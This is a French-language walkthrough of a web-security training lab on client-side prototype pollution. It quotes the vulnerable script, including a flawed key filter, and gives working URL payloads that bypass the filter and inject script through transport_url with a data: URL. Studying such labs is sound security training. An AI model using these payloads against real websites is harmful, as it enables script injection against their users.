Prototype pollution côté client via sanitisation défectueuse

Client-side prototype pollution via flawed sanitization

Lab: Client-side prototype pollution via flawed sanitization | Web Security AcademyWebSecAcademy

1) Contexte et idée générale

L’application lit les paramètres d’URL puis les transforme en objet JavaScript via deparam(...) :

Elle construit config = { params: deparam(...) }
Ensuite, elle utilise config.transport_url pour charger un <script src="...">

Pour éviter la prototype pollution, les devs ont ajouté sanitizeKey() qui supprime les sous-chaînes suivantes dans les clés : constructor, __proto__, prototype.

Problème : cette “sanitisation” fait juste un replaceAll. Si on découpe le mot interdit en morceaux, après remplacement il peut se reconstituer.

async function logQuery(url, params) {
    try {
        await fetch(url, {method: "post", keepalive: true, body: JSON.stringify(params)});
    } catch(e) {
        console.error("Failed storing query");
    }
}

async function searchLogger() {
    let config = {params: deparam(new URL(location).searchParams.toString())};
    if(config.transport_url) {
        let script = document.createElement('script');
        script.src = config.transport_url;
        document.body.appendChild(script);
    }
    if(config.params && config.params.search) {
        await logQuery('/logger', config.params);
    }
}

function sanitizeKey(key) {
    let badProperties = ['constructor','__proto__','prototype'];
    for(let badProperty of badProperties) {
        key = key.replaceAll(badProperty, '');
    }
    return key;
}

window.addEventListener("load", searchLogger);

2) Source : contourner le filtre et polluer `Object.prototype`

Le filtre enlève __proto__ si c’est présent tel quel. On le reconstruit en mettant __proto__ au milieu d’une clé plus grande, de manière à ce que, après suppression, la clé finale devienne exactement __proto__.

Payload (contournement) :

?__pro__proto__to__[foo]=bar

Après sanitisation :

__pro__proto__to__ → (suppression de __proto__) → __proto__

Donc ça revient à faire :

?__proto__[foo]=bar → pollution du prototype global

Vérification dans la console :

console.log({}.foo)

4) Exploit final : déclencher `alert()`

On pollue transport_url avec un schéma data: qui exécute du JS quand le script est chargé :

?__pro__proto__to__[transport_url]=data:,alert(1)

Mis à jour il y a 1 mois

hashtagClient-side prototype pollution via flawed sanitization

hashtag1) Contexte et idée générale

hashtag2) Source : contourner le filtre et polluer Object.prototype

hashtag4) Exploit final : déclencher alert()

Client-side prototype pollution via flawed sanitization

1) Contexte et idée générale

2) Source : contourner le filtre et polluer `Object.prototype`

4) Exploit final : déclencher `alert()`